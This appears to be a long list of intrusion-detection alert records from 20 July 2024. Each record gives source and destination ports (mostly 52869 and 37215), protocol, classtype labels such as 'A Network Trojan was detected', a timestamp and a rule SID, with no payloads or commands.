                      Source Port:55636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:19.589495
                      SID:2025132
                      Source Port:53826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.520621
                      SID:2027339
                      Source Port:35144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.571697
                      SID:2025132
                      Source Port:59418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.002504
                      SID:2027339
                      Source Port:38118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.787750
                      SID:2835222
                      Source Port:37662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.173548
                      SID:2025132
                      Source Port:36206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.330643
                      SID:2831300
                      Source Port:52102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.015672
                      SID:2831300
                      Source Port:39396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.801468
                      SID:2027339
                      Source Port:44476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2025132
                      Source Port:42456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.721858
                      SID:2027339
                      Source Port:42036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.981798
                      SID:2027339
                      Source Port:44846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.528399
                      SID:2027339
                      Source Port:39370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2829579
                      Source Port:33442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330485
                      SID:2027339
                      Source Port:53420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.004757
                      SID:2025132
                      Source Port:60122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.903540
                      SID:2027339
                      Source Port:35102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.227564
                      SID:2027339
                      Source Port:43064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.413313
                      SID:2831300
                      Source Port:55632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.299139
                      SID:2831300
                      Source Port:38898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2831300
                      Source Port:50764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.474845
                      SID:2831300
                      Source Port:42796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:34.302136
                      SID:2027339
                      Source Port:58994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.420371
                      SID:2027339
                      Source Port:55704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2835222
                      Source Port:38938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.060226
                      SID:2027339
                      Source Port:34616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.548040
                      SID:2025132
                      Source Port:33074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.188277
                      SID:2829579
                      Source Port:39194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2835222
                      Source Port:34350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.338978
                      SID:2027339
                      Source Port:37392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.831222
                      SID:2027339
                      Source Port:48730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.377377
                      SID:2831300
                      Source Port:51110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.502843
                      SID:2831300
                      Source Port:51910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.093345
                      SID:2027339
                      Source Port:53032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.858612
                      SID:2835222
                      Source Port:39984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.102034
                      SID:2027339
                      Source Port:46134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625707
                      SID:2829579
                      Source Port:55664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.686896
                      SID:2027339
                      Source Port:49576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.055924
                      SID:2027339
                      Source Port:46612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515827
                      SID:2831300
                      Source Port:58830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:53.291407
                      SID:2831300
                      Source Port:38084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.805275
                      SID:2027339
                      Source Port:55958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.032977
                      SID:2027339
                      Source Port:45532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.020423
                      SID:2025132
                      Source Port:47882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.320378
                      SID:2025132
                      Source Port:47732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:39.471724
                      SID:2831300
                      Source Port:60972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.182639
                      SID:2027339
                      Source Port:40828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2835222
                      Source Port:44754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.186287
                      SID:2027339
                      Source Port:47062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.386529
                      SID:2829579
                      Source Port:36690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.673228
                      SID:2027339
                      Source Port:49436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.236295
                      SID:2831300
                      Source Port:49132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.437928
                      SID:2027339
                      Source Port:42174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.709520
                      SID:2027339
                      Source Port:58988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.356049
                      SID:2025132
                      Source Port:41384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.037160
                      SID:2025132
                      Source Port:52304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.483611
                      SID:2831300
                      Source Port:60458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.780537
                      SID:2025132
                      Source Port:46208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.200464
                      SID:2027339
                      Source Port:54874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.641445
                      SID:2831300
                      Source Port:40180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:26.022416
                      SID:2831300
                      Source Port:56356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.482812
                      SID:2027339
                      Source Port:50740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.446803
                      SID:2027339
                      Source Port:50050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2835222
                      Source Port:49478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.562825
                      SID:2027339
                      Source Port:41738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.184596
                      SID:2027339
                      Source Port:49922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2835222
                      Source Port:40044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330485
                      SID:2831300
                      Source Port:53420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2829579
                      Source Port:37220
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.032993
                      SID:2831300
                      Source Port:60994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.088978
                      SID:2025132
                      Source Port:51422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.472951
                      SID:2831300
                      Source Port:39124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.813206
                      SID:2831300
                      Source Port:49220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:20.681117
                      SID:2025132
                      Source Port:49660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.721858
                      SID:2027339
                      Source Port:35604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2829579
                      Source Port:39400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.233952
                      SID:2025132
                      Source Port:58058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.458215
                      SID:2027339
                      Source Port:48224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.517577
                      SID:2025132
                      Source Port:50690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.466707
                      SID:2027339
                      Source Port:49030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2835222
                      Source Port:59462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.470289
                      SID:2831300
                      Source Port:42678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.572216
                      SID:2027339
                      Source Port:60306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.289186
                      SID:2027339
                      Source Port:44792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435097
                      SID:2835222
                      Source Port:41354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515632
                      SID:2831300
                      Source Port:45298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.570741
                      SID:2831300
                      Source Port:32830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:53.548834
                      SID:2027339
                      Source Port:51182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.328788
                      SID:2027339
                      Source Port:54766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.464393
                      SID:2025132
                      Source Port:53160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.001861
                      SID:2027339
                      Source Port:60434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.257590
                      SID:2027339
                      Source Port:36938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.304282
                      SID:2025132
                      Source Port:54356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.202361
                      SID:2025132
                      Source Port:47542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.227561
                      SID:2027339
                      Source Port:55388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2835222
                      Source Port:40056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.106017
                      SID:2025132
                      Source Port:57574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.127943
                      SID:2829579
                      Source Port:42066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.469355
                      SID:2027339
                      Source Port:44278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.028871
                      SID:2027339
                      Source Port:59476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.309569
                      SID:2027339
                      Source Port:60756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.957724
                      SID:2025132
                      Source Port:48996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.359635
                      SID:2027339
                      Source Port:38086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.361899
                      SID:2025132
                      Source Port:39372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2829579
                      Source Port:60716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2835222
                      Source Port:43704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.025518
                      SID:2025132
                      Source Port:57978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2829579
                      Source Port:36342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2829579
                      Source Port:37492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.355766
                      SID:2027339
                      Source Port:39936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.501893
                      SID:2027339
                      Source Port:54978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.187455
                      SID:2027339
                      Source Port:60670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.971515
                      SID:2831300
                      Source Port:35054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.480553
                      SID:2027339
                      Source Port:56136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.204945
                      SID:2027339
                      Source Port:35048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.684507
                      SID:2027339
                      Source Port:44864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.549791
                      SID:2027339
                      Source Port:51788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:43.392497
                      SID:2831300
                      Source Port:40646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.572723
                      SID:2027339
                      Source Port:52738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2835222
                      Source Port:41334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.549014
                      SID:2027339
                      Source Port:33456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.415863
                      SID:2027339
                      Source Port:33918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.327630
                      SID:2831300
                      Source Port:57426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.546626
                      SID:2831300
                      Source Port:50716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.036059
                      SID:2027339
                      Source Port:56264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.906796
                      SID:2027339
                      Source Port:58614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.550859
                      SID:2027339
                      Source Port:43604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.145339
                      SID:2831300
                      Source Port:36592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.234699
                      SID:2829579
                      Source Port:57862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.584797
                      SID:2025132
                      Source Port:56384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.530661
                      SID:2025132
                      Source Port:58316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.407056
                      SID:2831300
                      Source Port:54092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2835222
                      Source Port:42830
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.728529
                      SID:2025132
                      Source Port:33502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.366643
                      SID:2027339
                      Source Port:58522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2835222
                      Source Port:38858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.929116
                      SID:2027339
                      Source Port:46580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.686896
                      SID:2025132
                      Source Port:40980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.159681
                      SID:2025132
                      Source Port:46740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.938370
                      SID:2025132
                      Source Port:38776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:51.585302
                      SID:2025132
                      Source Port:44996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.253230
                      SID:2027339
                      Source Port:48432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2835222
                      Source Port:35238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.925505
                      SID:2025132
                      Source Port:48402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.624854
                      SID:2835222
                      Source Port:45864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.523772
                      SID:2027339
                      Source Port:42614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.050437
                      SID:2829579
                      Source Port:54196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.044272
                      SID:2831300
                      Source Port:42620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2835222
                      Source Port:55582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.433285
                      SID:2027339
                      Source Port:52064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.361541
                      SID:2027339
                      Source Port:45714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.136226
                      SID:2831300
                      Source Port:52870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.491493
                      SID:2831300
                      Source Port:57944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.884219
                      SID:2027339
                      Source Port:41864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.467143
                      SID:2027339
                      Source Port:46694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:40.199749
                      SID:2025132
                      Source Port:50784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.236295
                      SID:2831300
                      Source Port:58668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.088978
                      SID:2027339
                      Source Port:51422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2835222
                      Source Port:46300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.435146
                      SID:2027339
                      Source Port:46886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.170267
                      SID:2831300
                      Source Port:43530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.035057
                      SID:2025132
                      Source Port:58616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.549030
                      SID:2025132
                      Source Port:44836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.330840
                      SID:2831300
                      Source Port:58656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2835222
                      Source Port:32884
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.138961
                      SID:2027339
                      Source Port:49594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.216515
                      SID:2025132
                      Source Port:35800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2835222
                      Source Port:43134
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2829579
                      Source Port:55362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.815988
                      SID:2027339
                      Source Port:57374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:27.665768
                      SID:2027339
                      Source Port:52100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.352367
                      SID:2025132
                      Source Port:39010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.273333
                      SID:2831300
                      Source Port:40060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.005301
                      SID:2025132
                      Source Port:49798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:36.644546
                      SID:2027339
                      Source Port:53318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.139087
                      SID:2831300
                      Source Port:33326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.857672
                      SID:2027339
                      Source Port:39672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449834
                      SID:2831300
                      Source Port:44080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.079907
                      SID:2025132
                      Source Port:45802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
